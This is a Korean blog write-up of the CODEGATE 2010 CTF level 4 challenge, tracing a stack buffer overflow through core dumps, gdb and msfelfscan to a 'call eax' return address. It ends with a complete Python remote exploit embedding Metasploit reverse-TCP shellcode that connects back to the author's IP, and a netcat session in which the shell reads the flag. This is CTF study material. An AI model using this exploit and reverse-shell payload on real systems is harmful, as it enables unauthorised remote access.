CODEGATE 2010 CHALLENGE 4

http://coma.0x3f.net/uncategorized/codegate2010-ctf-level-4/
위 사이트에 올라온 풀이를 보고 다시 한번 풀어 정리를 하여 보았다.

해당 문제를 통해 msfelfscan의 사용법과 core 파일 생성 및 디버깅 방법을 확인할 수 있었다.
\xcc를 이용하여 흐름을 파악하는 과정은 정말 도움이 많이 될 거 같다.

[byjjoon@ByJJoon CODEGATE]$ ulimit -c 50000
[byjjoon@ByJJoon CODEGATE]$ python -c "print 'A'*272" | ./easy   
Input: Segmentation fault (core dumped)
[byjjoon@ByJJoon CODEGATE]$ gdb easy core.14150 
GNU gdb Fedora (6.8-24.fc9)
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./easy'.
Program terminated with signal 11, Segmentation fault.
[New process 14150]
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc.i686
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x098c000a in ?? ()
#2  0x00000112 in ?? ()
#3  0x00a58420 in ?? () from /lib/libc.so.6
#4  0x00a57ff4 in ?? () from /lib/libc.so.6
#5  0x008e1dd0 in ?? () from /lib/ld-linux.so.2
#6  0x08048430 in ?? ()
#7  0x00000112 in ?? ()
#8  0x098cd008 in ?? ()
#9  0x08048590 in ?? ()
#10 0x08048430 in ?? ()
#11 0xbfe84218 in ?? ()
#12 0x009095d6 in __libc_start_main () from /lib/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb) q

덮어쓸 위치를 찾았다...이제 메타스플로잇에 있는 msfelfscan을 이용하여 [call eax] 위치를 찾아보자

[byjjoon@ByJJoon CODEGATE]$ ../Metasploit/msfelfscan easy -j eax
[easy]
0x080484df call eax
0x0804860b call eax

공격할 주소는 0x0804860b 로 정했다.

[byjjoon@ByJJoon CODEGATE]$ python -c "print '\x90'*268 + 'AAAA' + '\x90'*100" | ./easy 
Input: Segmentation fault (core dumped)
[byjjoon@ByJJoon CODEGATE]$ ls
core.14150  core.14155  easy
[byjjoon@ByJJoon CODEGATE]$ gdb easy core.14155 
GNU gdb Fedora (6.8-24.fc9)
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./easy'.
Program terminated with signal 11, Segmentation fault.
[New process 14155]
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc.i686
(gdb) x/32wx $eax
0xbf9184e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9184f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918500:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918510:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918520:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918530:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918550:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 
0xbf918560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185d0:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 
0xbf9185e0:     0x90909090      0x90909090      0x90909090      0x41414141
0xbf9185f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918600:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918610:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918620:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918630:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918640:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918650:     0x90909090      0xb7e8000a      0x00000000      0x00000000
(gdb) q

정확하게 EIP가 0x41414141 (AAAA)로 바뀐것을 확인할 수 있었다.
이제 해당 부분에 원하는 주소로 넣고 공격을 해보도록 하자.

[byjjoon@ByJJoon CODEGATE]$ python -c "print '\x90'*268 + '\x0b\x86\x04\x08' + '\xcc'*300" | ./easy                               
Input: Trace/breakpoint trap (core dumped)
[byjjoon@ByJJoon CODEGATE]$ 

우리가 원하는 대로 \xcc 부분에서 trap이 걸린걸 확인 할 수 있었다.
이제 아래와 같이 구성하여 공격을 진행하도록 하자.

[NOP*268] + [EIP] + [NOP*100] + [SHELLCODE]
#!/usr/bin/python
import sys
import socket
import time
from struct import pack

shellcode = ''
# linux/x86/shell_reverse_tcp - 98 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=211.218.16.105, LPORT=9999, ReverseConnectRetries=5,
# PrependSetresuid=false, PrependSetreuid=false,
# PrependSetuid=false, PrependChrootBreak=false,
# AppendExit=false
shellcode += '\xba\x8b\xb0\xd0\x7f\xd9\xc2\xd9\x74\x24\xf4\x29\xc9\x5e'
shellcode += '\xb1\x12\x31\x56\x15\x03\x56\x15\x83\xc6\x04\xe2\x7e\x81'
shellcode += '\x0b\x88\x63\xb1\xe8\x24\x09\x34\x66\x2b\x7d\x5e\xb5\x2c'
shellcode += '\x26\xc1\x2d\xfe\x02\xed\xc4\x66\xda\x29\x18\x01\x49\x5c'
shellcode += '\x36\x9c\x3d\x29\xd7\x5d\xd7\x4f\x40\xaf\xa7\xc9\xf7\xf6'
shellcode += '\x17\xd6\x3a\x88\x1e\x50\x3c\xd9\xc8\x8d\x91\xa9\x60\xba'
shellcode += '\xc2\x2f\x19\x54\x94\x53\x89\xfb\x2f\x72\x99\xf7\xe2\xf5'

def send_payload(host, port, payload):
    print '[+] Connect - %s:%d' % (host, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    a = s.recv(128)
    print '[+] Receive - %s' % a
    time.sleep(2)
    print '[+] Sending Payload'
    s.send(payload)
    s.close()

def main():
    host = 'ctf4.codegate.org'
    port = 9000

    payload = ''
    payload += '\x90'*268
    payload += pack('<L', 0x0804860b)
    payload += '\x90'*100 + shellcode

    send_payload(host, port, payload)

if __name__ == '__main__':
    print '[+] Strat!'
    main()
D:\Python Programming\PYTHON CODE\TEMPLATE>remote_exploit.py
[+] Strat!
[+] Connect - ctf4.codegate.org:9000
[+] Receive - Input:
[+] Sending Payload
C:\Windows\SysWOW64>nc -l -p 9999 -vv
listening on [any] 9999 ...
222.239.224.233: inverse host lookup failed:  : Operation not permitted
connect to [211.218.16.105] from (UNKNOWN) [222.239.224.233] 58756

ls
ls: cannot open directory .: Permission denied
id
uid=1003(easy) gid=1003(easy)
pwd
/
cd /home/easy
ls
easy
examples.desktop
flag.txt
cat flag.txt
bc15d4ddf6ca486682064ad226a7ff1b  -

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다